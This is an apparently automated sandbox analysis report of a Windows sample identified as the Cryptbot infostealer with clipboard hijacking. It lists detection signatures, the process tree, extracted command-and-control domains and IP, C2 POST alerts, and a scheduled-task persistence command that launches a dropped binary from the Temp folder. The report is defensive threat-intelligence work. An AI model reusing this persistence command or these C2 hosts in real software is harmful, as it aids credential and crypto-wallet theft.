Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1538262
MD5:	0ddaf55ff5b6daf269845dee74b4f24b
SHA1:	9b9363db8deadeee5803ce1751230fb56d776501
SHA256:	6798b30915ded323d8ca7f310a7d518cfa5de39bcc20ae984c9a3b65ccbeb941
Tags:	exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6356 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0DDAF55FF5B6DAF269845DEE74B4F24B)

service123.exe (PID: 6020 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 65DFC01E9903D5B061EA2A791EC0F5AD)

schtasks.exe (PID: 2484 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 6148 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 65DFC01E9903D5B061EA2A791EC0F5AD)

service123.exe (PID: 3624 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 65DFC01E9903D5B061EA2A791EC0F5AD)

service123.exe (PID: 5624 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 65DFC01E9903D5B061EA2A791EC0F5AD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["+sevtbb17sb.top", "ozsevtbb17sb.top", "oosevtbb17sb.top", "sb.top", "EFsevtbb17sb.top", "sevtbb17sb.top", "analforeverlovyu.top", "b17sb.top", "POSTb17sb.top", "7sb.top", "@sevtbb17sb.top", "icsevtbb17sb.top", "bb17sb.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2969253307.0000000004057000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 6356	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 6356	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6356	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 6020	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.service123.exe.6c2e0000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6356, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 2484, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T22:47:14.177580+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49730	193.46.218.44	80	TCP
2024-10-20T22:47:15.460620+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49731	193.46.218.44	80	TCP
2024-10-20T22:47:16.939730+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49732	193.46.218.44	80	TCP
2024-10-20T22:47:18.231591+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49733	193.46.218.44	80	TCP
2024-10-20T22:47:19.483270+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49734	193.46.218.44	80	TCP
2024-10-20T22:47:20.739676+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49735	193.46.218.44	80	TCP
2024-10-20T22:47:21.988846+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49737	193.46.218.44	80	TCP
2024-10-20T22:47:23.306546+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49739	193.46.218.44	80	TCP
2024-10-20T22:47:24.550897+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49742	193.46.218.44	80	TCP
2024-10-20T22:47:25.813529+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49744	193.46.218.44	80	TCP
2024-10-20T22:47:27.056074+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49747	193.46.218.44	80	TCP
2024-10-20T22:47:28.332785+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49749	193.46.218.44	80	TCP
2024-10-20T22:47:29.573331+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49751	193.46.218.44	80	TCP
2024-10-20T22:47:30.899693+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49753	193.46.218.44	80	TCP
2024-10-20T22:47:32.187509+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49755	193.46.218.44	80	TCP
2024-10-20T22:47:33.815859+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49757	193.46.218.44	80	TCP
2024-10-20T22:47:35.074961+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49758	193.46.218.44	80	TCP
2024-10-20T22:47:36.423971+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49759	193.46.218.44	80	TCP
2024-10-20T22:47:37.678281+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49760	193.46.218.44	80	TCP
2024-10-20T22:47:39.227376+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49761	193.46.218.44	80	TCP
2024-10-20T22:47:40.623127+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49762	193.46.218.44	80	TCP
2024-10-20T22:47:41.941495+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49763	193.46.218.44	80	TCP
2024-10-20T22:47:43.270187+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49764	193.46.218.44	80	TCP
2024-10-20T22:47:45.480586+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49765	193.46.218.44	80	TCP
2024-10-20T22:47:46.820515+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49766	193.46.218.44	80	TCP
2024-10-20T22:47:48.185050+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49767	193.46.218.44	80	TCP
2024-10-20T22:47:49.781020+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49768	193.46.218.44	80	TCP
2024-10-20T22:47:51.405117+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49769	193.46.218.44	80	TCP
2024-10-20T22:47:53.033182+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49770	193.46.218.44	80	TCP
2024-10-20T22:47:54.685049+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49771	193.46.218.44	80	TCP
2024-10-20T22:47:56.285079+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49772	193.46.218.44	80	TCP
2024-10-20T22:47:57.985042+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49773	193.46.218.44	80	TCP
2024-10-20T22:47:59.629008+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49774	193.46.218.44	80	TCP
2024-10-20T22:48:01.233075+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49776	193.46.218.44	80	TCP
2024-10-20T22:48:03.841471+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49787	193.46.218.44	80	TCP
2024-10-20T22:48:07.858828+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49798	193.46.218.44	80	TCP
2024-10-20T22:48:09.313856+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49808	193.46.218.44	80	TCP
2024-10-20T22:48:10.727401+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49815	193.46.218.44	80	TCP
2024-10-20T22:48:12.284875+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49822	193.46.218.44	80	TCP
2024-10-20T22:48:13.801473+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49833	193.46.218.44	80	TCP
2024-10-20T22:48:15.228986+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49840	193.46.218.44	80	TCP
2024-10-20T22:48:16.674355+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49847	193.46.218.44	80	TCP
2024-10-20T22:48:18.128906+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49854	193.46.218.44	80	TCP
2024-10-20T22:48:19.686961+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49866	193.46.218.44	80	TCP
2024-10-20T22:48:21.131853+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49873	193.46.218.44	80	TCP
2024-10-20T22:48:22.556092+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49880	193.46.218.44	80	TCP
2024-10-20T22:48:23.960187+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49890	193.46.218.44	80	TCP
2024-10-20T22:48:25.394793+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49896	193.46.218.44	80	TCP
2024-10-20T22:48:26.934373+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49902	193.46.218.44	80	TCP
2024-10-20T22:48:28.537204+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49913	193.46.218.44	80	TCP
2024-10-20T22:48:29.961950+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49919	193.46.218.44	80	TCP
2024-10-20T22:48:31.744837+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49924	193.46.218.44	80	TCP
2024-10-20T22:48:33.289901+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49934	193.46.218.44	80	TCP
2024-10-20T22:48:34.968084+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49941	193.46.218.44	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: file.exe.6356.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["+sevtbb17sb.top", "ozsevtbb17sb.top", "oosevtbb17sb.top", "sb.top", "EFsevtbb17sb.top", "sevtbb17sb.top", "analforeverlovyu.top", "b17sb.top", "POSTb17sb.top", "7sb.top", "@sevtbb17sb.top", "icsevtbb17sb.top", "bb17sb.top"]}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_002D15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		6_2_002D15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 6_2_6C2E14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		6_2_6C2E14B0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	6_2_002D81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	6_2_6C35AC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	6_2_6C35AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	6_2_6C35AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	6_2_6C382EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	6_2_6C2FAF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C3BF960h	6_2_6C2FE8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	6_2_6C30E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	6_2_6C30E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	6_2_6C3004F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	6_2_6C3804E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	6_2_6C300610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	6_2_6C30A720
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	6_2_6C30A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	6_2_6C30A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	6_2_6C300010
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6C3BD014h]	6_2_6C3B4110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	6_2_6C304203
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	6_2_6C388250
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	6_2_6C30C2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	6_2_6C30A330
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	6_2_6C30A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	6_2_6C30A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	6_2_6C35BDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	6_2_6C35BF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	6_2_6C339F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	6_2_6C339910
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	6_2_6C399900
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	6_2_6C31B987
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	6_2_6C31B98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	6_2_6C35BAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	6_2_6C357AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	6_2_6C30D424
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C3BDFF4h	6_2_6C353440
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	6_2_6C30D5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	6_2_6C3535F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	6_2_6C30D724
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	6_2_6C30D050
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	6_2_6C377100
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	6_2_6C30D2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	6_2_6C35B280
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	6_2_6C3593B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49742 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49731 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49758 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49755 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49734 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49751 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49760 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49739 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49764 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49732 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49749 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49761 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49765 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49730 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49733 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49735 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49747 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49762 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49744 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49737 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49766 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49757 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49768 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49769 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49763 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49776 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49774 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49770 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49767 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49771 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49773 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49759 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49753 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49798 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49808 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49787 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49822 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49815 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49833 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49840 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49847 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49854 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49866 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49772 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49890 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49902 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49880 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49913 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49896 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49873 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49919 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49934 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49924 -> 193.46.218.44:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49941 -> 193.46.218.44:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: +sevtbb17sb.top
Source: Malware configuration extractor	URLs: ozsevtbb17sb.top
Source: Malware configuration extractor	URLs: oosevtbb17sb.top
Source: Malware configuration extractor	URLs: sb.top
Source: Malware configuration extractor	URLs: EFsevtbb17sb.top
Source: Malware configuration extractor	URLs: sevtbb17sb.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: b17sb.top
Source: Malware configuration extractor	URLs: POSTb17sb.top
Source: Malware configuration extractor	URLs: 7sb.top
